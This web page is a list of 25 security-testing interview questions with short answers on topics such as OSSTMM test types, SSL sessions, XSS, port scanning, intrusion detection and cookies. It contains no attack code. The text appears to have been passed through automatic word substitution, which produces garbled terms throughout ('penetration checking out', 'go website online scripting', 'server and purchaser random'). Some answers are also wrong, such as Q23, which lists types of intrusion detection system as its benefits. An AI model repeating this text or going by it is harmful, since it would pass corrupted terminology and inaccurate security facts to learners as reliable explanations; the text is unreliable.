Top 25 Security Testing Interview Questions
Q1. List Down The Seven Main Types Of Security Testing As Per Open Source Security Testing Methodology Manual?
The seven main kinds of security testing as according to Open Source Security Testing methodology manual are:
Vulnerability Scanning: Automated software scans a machine towards recognized vulnerabilities.
Security Scanning:Manual or automatic technique to identify network and device weaknesses.
Penetration checking out: Penetration trying out is on the security trying out which facilitates in identifying vulnerabilities in a device.
Risk Assessment: It includes analysis of viable chance within the gadget. Risks are labeled as Low, Medium and High.
Security Auditing:Complete inspection of structures and programs to stumble on vulnerabilities.
Ethical hacking:Hacking completed on a system to locate flaws in it in preference to private benefits.
Posture Assessment:This combines Security scanning, Ethical Hacking and Risk Assessments to reveal an ordinary protection posture of an employer.
Q2. List The Parameters That Define An Ssl Session Connection?
The parameters that outline an SSL session connection are:
Server and purchaser random
Server write MACsecret
Client write MACsecret
Server write key
Client write key
Initialization vectors
Sequence numbers
Q3. What Is Soap And Wsdl?
SOAP or Simple Object Access Protocol is a XML-primarily based protocol via which programs alternate data over HTTP. XML requests are ship by way of net offerings in SOAP format then a SOAP patron sends a SOAP message to the server. The server responds returned once more with a SOAP message together with the requested carrier.
Web Services Description Language (WSDL): is an XML formatted language used by UDDI. “Web Services Description Language describes Web services and the way to access them”.
Q4. What Is Ssl Connection And An Ssl Session?
SSL or secured socket layer connection is a temporary peer-to-peer communications hyperlink wherein each connection is related to one SSL Session.
SSL consultation can be defines as association among client and server commonly crated via handshake protocol. There are set of parameters are described and it could be share through multiple SSL connections.
Q5. What Is The Intrusion Detection?
Intrusion detection is a gadget which helps in figuring out feasible attacks and address it. Intrusion detection includes amassing data from many structures and assets, evaluation of the records and find out the viable approaches of attack on the machine.
Intrusion detection test following:
Possible assaults
Any atypical hobby
Auditing the system information
Analysis of various amassed records etc.
Q6. List Down The Principal Categories Of Set Participants?
Following are the participants:
Cardholder
Merchant
Issuer
Acquirer
Payment gateway
Certification authority
Q7. What Is Security Testing?
Security testing may be considered most critical in all type of software trying out. Its major goal is to discover vulnerabilities in any software (web or networking) based totally application and shield their information from possible assaults or intruders.
As many packages includes private information and wishes to be protected being leaked. Software trying out wishes to be finished periodically on such applications to perceive threats and to take immediate motion on them.
Q8. What Is Port Scanning?
Ports are the point from where records goes inside and outside of any device. Scanning of the ports to discover any loop holes inside the device are referred to as Port Scanning. There may be a few vulnerable points in the system to which hackers can assault and get the critical information. These factors have to be diagnosed and averted from any misuse.
Following are the varieties of port scans:
Strobe: Scanning of recognized services.
UDP: Scanning of open UDP ports
Vanilla: In this scanning the scanner tries to connect with all 65,535 ports.
Sweep: The scanner connects to the equal port on multiple gadget.
Fragmented packets: The scanner sends packet fragments that get via easy packet filters in a firewall
Stealth experiment: The scanner blocks the scanned computer from recording the port scan activities.
FTP leap: The scanner is going thru an FTP server to be able to conceal the supply of the scan.
Q9. List Down Some Factors That Can Cause Vulnerabilities?
Factors causing vulnerabilities are:
Design flaws – If there are loop holes inside the system that may allow hackers to assault the system without problems.
Passwords – If passwords are acknowledged to hackers they could get the records very easily. Password policy must be accompanied rigorously to decrease the threat of password thieve.
Complexity – Complex software can open the doorways on vulnerabilities.
Human Error – Human mistakes is a extensive supply of security vulnerabilities.
Management – Poor management of the information can lead to the vulnerabilities within the device.
Q10. What Is Xss Or Cross Site Scripting?
XSS or go website online scripting is type of vulnerability that hackers used to attack net applications.
It permits hackers to inject HTML or JAVASCRIPT code into a web web page that can scouse borrow the confidential statistics from the cookies and returns to the hackers. It is one of the maximum critical and common approach which wishes to be prevented.
Q11. What Is File Enumeration?
This form of attack makes use of the forceful browsing with the URL manipulation attack. Hackers can manage the parameters in url string and can get the vital information which typically no longer open for public consisting of executed facts, old model or records which in below development.
Q12. List The Full Names Of Abbreviations Related To Software Security?
Abbreviations related to software program security are:
IPsec – Internet Protocol Security is a suite of protocols for securing Internet
OSI – Open Systems Interconnection
ISDN Integrated Services Digital Network
GOSIP- Government Open Systems Interconnection Profile
FTP – File Transfer Protocol
DBA – Dynamic Bandwidth Allocation
DDS – Digital Data System
DES – Data -Encryption Standard
CHAP – Challenge Handshake Authentication Protocol
BONDING – Bandwidth On Demand Interoperability Group
SSH – The Secure Shell
COPS Common Open Policy Service
ISAKMP – Internet Security Association and Key Management Protocol
USM – User-based totally Security Model
TLS – The Transport Layer Security
Q13. List The Various Methodologies In Security Testing?
Methodologies in Security testing are:
White Box- All the statistics are supplied to the testers.
Black Box- No facts is supplied to the testers and they can take a look at the system in actual global situation.
Grey Box- Partial facts is with the testers and rest they should rest on their own.
Q14. What Is Iso 17799?
ISO/IEC 17799 is at first published in UK and defines satisfactory practices for Information Security Management. It has guidelines for all businesses small or massive for Information protection.
Q15. List The Parameters That Define An Ssl Session State?
The parameters that define an SSL session country are:
Session identifier
Peer certificates
Compression method
Cipher spec
Master secret
Is resumable
Q16. Name The Two Common Techniques Used To Protect A Password File?
Two commonplace strategies to guard a password file are- hashed passwords and a salt cost or password record get right of entry to control.
Q17. What Are The Types Of Cookies?
Types of Cookies are:
Session Cookies – These cookies are brief and closing in that session only.
Persistent cookies – These cookies saved at the difficult disk pressure and last till its expiry or manually removal of it.
Q18. What Is A Honeypot?
Honeypot is faux pc gadget which behaves like a actual gadget and draws hackers to attack on it. Honeypot is used to discover loop holes inside the machine and to offer solution for these sorts of attacks.
Q19. What Is Hids?
HIDS or Host Intrusion Detection gadget is a system in which picture of the existing machine is taken and compares with the previous snap shot. It assessments if critical files were changed or deleted then a alert is generated and ship to the administrator.
Q20. List The Component Used In Ssl?
Secure Sockets Layer protocol or SSL is used to make comfy connection among consumer and computer systems.
Below are the element utilized in SSL:
SSL Recorded protocol
Handshake protocol
Change Cipher Spec
Encryption algorithms
Q21. What Are The Three Classes Of Intruders?
Following are the three training of intruders:
Masquerader: It can be defined as an character who isn't authorized at the computer but hack the gadget’s get right of entry to control and get the access of authenticated user’s account.
Misfeasor: In this example consumer is authenticated to use the system sources however he miss makes use of his get admission to on the gadget.
Clandestine person It may be defined as an character who hacks the manage device of the device and bypasses the machine security gadget.
Q22. Describe Network Intrusion Detection System?
Network Intrusion Detection device typically referred to as NIDS. It is used for analysis of the passing site visitors at the entire sub-net and to in shape with the recognized assaults. If any loop hollow diagnosed then administrator receives an alert.
Q23. List The Benefits That Can Be Provided By An Intrusion Detection System?
There are 3 blessings of an intrusion detection machine.
NIDS or Network Intrusion Detection
NNIDS or Network Node Intrusion detection system
HIDS or Host Intrusion Detection System
Q24. What Is A Cookie?
Cookie is a bit of statistics received from internet server and stored in a web browser which may be read anytime later. Cookie can contain password records, a few automobile fill facts and if any hackers get these info it is able to be dangerous.
Q25. List The Attributes Of Security Testing?
There are following seven attributes of Security Testing:
Authentication
Authorization
Confidentiality
Availability
Integrity
Non-repudiation
Resilience
